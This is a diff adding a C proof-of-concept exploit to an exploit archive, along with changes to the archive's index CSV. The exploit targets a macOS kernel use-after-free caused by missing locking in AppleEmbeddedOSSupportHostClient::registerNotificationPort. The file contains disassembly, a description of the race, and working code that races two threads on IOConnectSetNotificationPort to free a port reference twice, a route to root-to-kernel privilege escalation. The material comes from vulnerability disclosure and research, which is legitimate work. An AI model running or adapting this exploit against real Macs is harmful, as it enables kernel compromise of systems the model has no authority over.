diff --git a/exploits/macos/dos/44007.c b/exploits/macos/dos/44007.c new file mode 100644 index 000000000..b966f65f7 --- /dev/null +++ b/exploits/macos/dos/44007.c @@ -0,0 +1,150 @@ +/* +AppleEmbeddedOSSupportHost.kext is presumably involved in the communication with the OS running on the touch bar on new MBP models. + +Here's the userclient's registerNotificationPort method: + +__text:0000000000002DE4 ; AppleEmbeddedOSSupportHostClient::registerNotificationPort(ipc_port *, unsigned int, unsigned int) +__text:0000000000002DE4 push rbp +__text:0000000000002DE5 mov rbp, rsp +__text:0000000000002DE8 push r14 +__text:0000000000002DEA push rbx +__text:0000000000002DEB mov r14, rsi +__text:0000000000002DEE mov rbx, rdi +__text:0000000000002DF1 mov rdi, [rbx+0E8h] +__text:0000000000002DF8 test rdi, rdi +__text:0000000000002DFB jz short loc_2E0D +__text:0000000000002DFD call __ZN12IOUserClient23releaseNotificationPortEP8ipc_port ; IOUserClient::releaseNotificationPort(ipc_port *) +__text:0000000000002E02 mov qword ptr [rbx+0E8h], 0 +__text:0000000000002E0D +__text:0000000000002E0D loc_2E0D: ; CODE XREF: AppleEmbeddedOSSupportHostClient::registerNotificationPort(ipc_port *,uint,uint)+17j +__text:0000000000002E0D mov [rbx+0E8h], r14 +__text:0000000000002E14 xor eax, eax +__text:0000000000002E16 pop rbx +__text:0000000000002E17 pop r14 +__text:0000000000002E19 pop rbp +__text:0000000000002E1A retn + +The IOUserClient superclass doesn't implement any locking for this method; it's up to the user client itself to correctly prevent +dangerous concurrent accesses. + +By calling registerNotificationPort in two threads in parallel we can cause a AppleEmbeddedOSSupportHostClient to drop two references on a port when +it only holds one. + +Note that AppleEmbeddedOSSupportHostClient is only reachable by root so this is a root -> kernel priv esc. + +Repro like this: while true; do ./embedded_host; done + +Please test on a machine which has a touchbar! + > kextstat | grep AppleEmbeddedOSSupport +should display something if it does. +*/ + +// ianbeer +#if 0 +MacOS kernel uaf due to lack of locking in AppleEmbeddedOSSupportHostClient::registerNotificationPort + +AppleEmbeddedOSSupportHost.kext is presumably involved in the communication with the OS running on the touch bar on new MBP models. + +Here's the userclient's registerNotificationPort method: + +__text:0000000000002DE4 ; AppleEmbeddedOSSupportHostClient::registerNotificationPort(ipc_port *, unsigned int, unsigned int) +__text:0000000000002DE4 push rbp +__text:0000000000002DE5 mov rbp, rsp +__text:0000000000002DE8 push r14 +__text:0000000000002DEA push rbx +__text:0000000000002DEB mov r14, rsi +__text:0000000000002DEE mov rbx, rdi +__text:0000000000002DF1 mov rdi, [rbx+0E8h] +__text:0000000000002DF8 test rdi, rdi +__text:0000000000002DFB jz short loc_2E0D +__text:0000000000002DFD call __ZN12IOUserClient23releaseNotificationPortEP8ipc_port ; IOUserClient::releaseNotificationPort(ipc_port *) +__text:0000000000002E02 mov qword ptr [rbx+0E8h], 0 +__text:0000000000002E0D +__text:0000000000002E0D loc_2E0D: ; CODE XREF: AppleEmbeddedOSSupportHostClient::registerNotificationPort(ipc_port *,uint,uint)+17j +__text:0000000000002E0D mov [rbx+0E8h], r14 +__text:0000000000002E14 xor eax, eax +__text:0000000000002E16 pop rbx +__text:0000000000002E17 pop r14 +__text:0000000000002E19 pop rbp +__text:0000000000002E1A retn + +The IOUserClient superclass doesn't implement any locking for this method; it's up to the user client itself to correctly prevent +dangerous concurrent accesses. + +By calling registerNotificationPort in two threads in parallel we can cause a AppleEmbeddedOSSupportHostClient to drop two references on a port when +it only holds one. + +Note that AppleEmbeddedOSSupportHostClient is only reachable by root so this is a root -> kernel priv esc. + +Repro like this: while true; do ./embedded_host; done + +Please test on a machine which has a touchbar! + > kextstat | grep AppleEmbeddedOSSupport +should display something if it does. +#endif + +#include +#include +#include + +#include +#include + +#include + +mach_port_t q() { + mach_port_t p = MACH_PORT_NULL; + mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &p); + mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND); + return p; +} + +volatile int start = 0; +volatile mach_port_t conn; + +void* racer(void* arg) { + while(!start){;} + IOConnectSetNotificationPort(conn, 0, MACH_PORT_NULL, 0); + return NULL; +} + + + +int main() { + kern_return_t err; + io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AppleEmbeddedOSSupportHost")); + + if (service == IO_OBJECT_NULL){ + printf("unable to find service\n"); + return 0; + } + + conn = MACH_PORT_NULL; + err = IOServiceOpen(service, mach_task_self(), 0, &conn); + if (err != KERN_SUCCESS){ + printf("unable to get user client connection\n"); + return 0; + } + + mach_port_t p = q(); + + IOConnectSetNotificationPort(conn, 0, p, 0); + + //mach_port_destroy(mach_task_self(), p); + // kernel holds the only ref + + + int n_threads = 2; + pthread_t threads[n_threads]; + for(uint32_t i = 0; i < n_threads; i++) { + pthread_create(&threads[i], NULL, racer, NULL); + } + + start = 1; + + for(uint32_t i = 0; i < n_threads; i++) { + pthread_join(threads[i], NULL); + } + + return 0; +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 755d55e05..8009c3077 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5492,6 +5492,7 @@ id,file,description,date,author,type,platform,port 43992,exploits/multiple/dos/43992.py,"Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption",2018-02-07,"Juan Sacco",dos,multiple,2000 43996,exploits/android/dos/43996.txt,"Android - 'getpidcon' Permission Bypass in KeyStore Service",2018-02-07,"Google Security Research",dos,android, 43998,exploits/multiple/dos/43998.txt,"Multiple OEM - 'nsd' Remote Stack Format String (PoC)",2017-12-14,bashis,dos,multiple, +44007,exploits/macos/dos/44007.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'",2018-02-09,"Google Security Research",dos,macos, 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware, 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows, 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows, @@ -16006,7 +16007,7 @@ id,file,description,date,author,type,platform,port 44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple, 44002,exploits/multiple/remote/44002.py,"Dahua Generation 2/3 - Backdoor Access",2017-05-02,bashis,remote,multiple, 44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware, -44005,exploits/multiple/remote/44005.py,"HPE iLO4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple, +44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple, 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows, 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows, 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22